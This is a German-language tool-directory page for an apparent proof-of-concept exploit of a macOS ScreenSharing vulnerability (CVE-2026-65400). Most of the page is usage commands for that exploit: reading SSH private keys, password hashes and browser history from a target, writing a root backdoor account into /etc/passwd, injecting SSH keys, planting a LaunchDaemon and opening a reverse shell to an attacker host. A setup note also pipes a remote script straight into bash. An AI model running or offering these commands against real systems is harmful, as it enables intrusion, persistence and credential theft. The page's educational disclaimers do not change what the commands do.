Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-65400 — Proof-of-Concept-Exploit für CVE-2026-65400, der authentifiziertes Lesen/Schreiben von Dateien, Reverse Shells und Persistenz auf macOS über Apple ScreenSharing ermöglicht. | Kitploit
Tools/GitHubGitHub/horkimhab/cve-2026-65400
Privilege EscalationPersistenzmechanismenExploitationPost-ExploitationAuthentifizierungLernen & BildungRemote-Access-Tool
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Proof-of-Concept-Exploit für CVE-2026-65400, der authentifiziertes Lesen/Schreiben von Dateien, Reverse Shells und Persistenz auf macOS über Apple ScreenSharing ermöglicht.

Repository anzeigen
3110vor 23 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2026-65400

Spenden

Unterstütze die Wartung dieses Projekts mit PayPal oder durch Scannen des QR-Codes unten.

paypal

QR-Code für Spenden

⚡ Einfache Nutzung

Verwende dieses Projekt nur in sicheren und autorisierten Umgebungen wie:

  • Lokale virtuelle Maschinen
  • Docker-Container
  • Isolierte Laborumgebungen
  • Autorisierte Penetrationstest-Umgebungen

Beispiel-Setup:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Beispielverwendung:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Hinweis:

  • Beim Klonen aus einem anderen Projekt musst du curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte .git-Verzeichnis zu entfernen.
  • z. B.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Quellen und Referenzen

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Repository für Bildung und Sicherheitsforschung

Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.


⚠️ Sicherheits- und Rechtshinweis

Zweck

Dieses Repository dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken.

Es soll Nutzern helfen, Folgendes zu lernen:

  • Sicherheitsschwachstellen
  • Sandbox- und Isolationskonzepte
  • Sichere Codierung und defensive Praktiken

Nur zur autorisierten Nutzung

Verwende dieses Repository nur in Umgebungen, für die du eine Berechtigung hast, wie zum Beispiel:

  • Persönliche Labore oder virtuelle Maschinen
  • Docker- oder isolierte Umgebungen
  • Autorisierte Penetrationstests
  • Cybersicherheitsschulungen oder akademische Forschung

Unbefugte oder illegale Nutzung ist strengstens untersagt.


Keine Haftung

Die Autoren und Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.

Durch die Nutzung dieses Repositorys erklärst du dich damit einverstanden, dass:

  • Du für deine eigenen Handlungen verantwortlich bist
  • Du es legal und ethisch verwenden wirst
  • Das Projekt ohne Gewährleistung bereitgestellt wird

Ethische Nutzung

Dieses Projekt ist gedacht für:

  • Defensive Sicherheitsforschung
  • Cybersicherheitsbildung
  • Sensibilisierung für Schwachstellen
  • Forschung zu sicheren Systemen und Software

Bitte befolge Praktiken der verantwortungsvollen Offenlegung und halte alle geltenden Gesetze ein.


Kontakt

Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktiere den Repository-Betreuer über GitHub.


Verwandtes Projekt

Entdecke die PoC-CVE-Sammlung für weitere CVE-Proof-of-Concept-Ressourcen, die für autorisierte Sicherheitsforschung und Bildung gedacht sind.

Tool herunterladen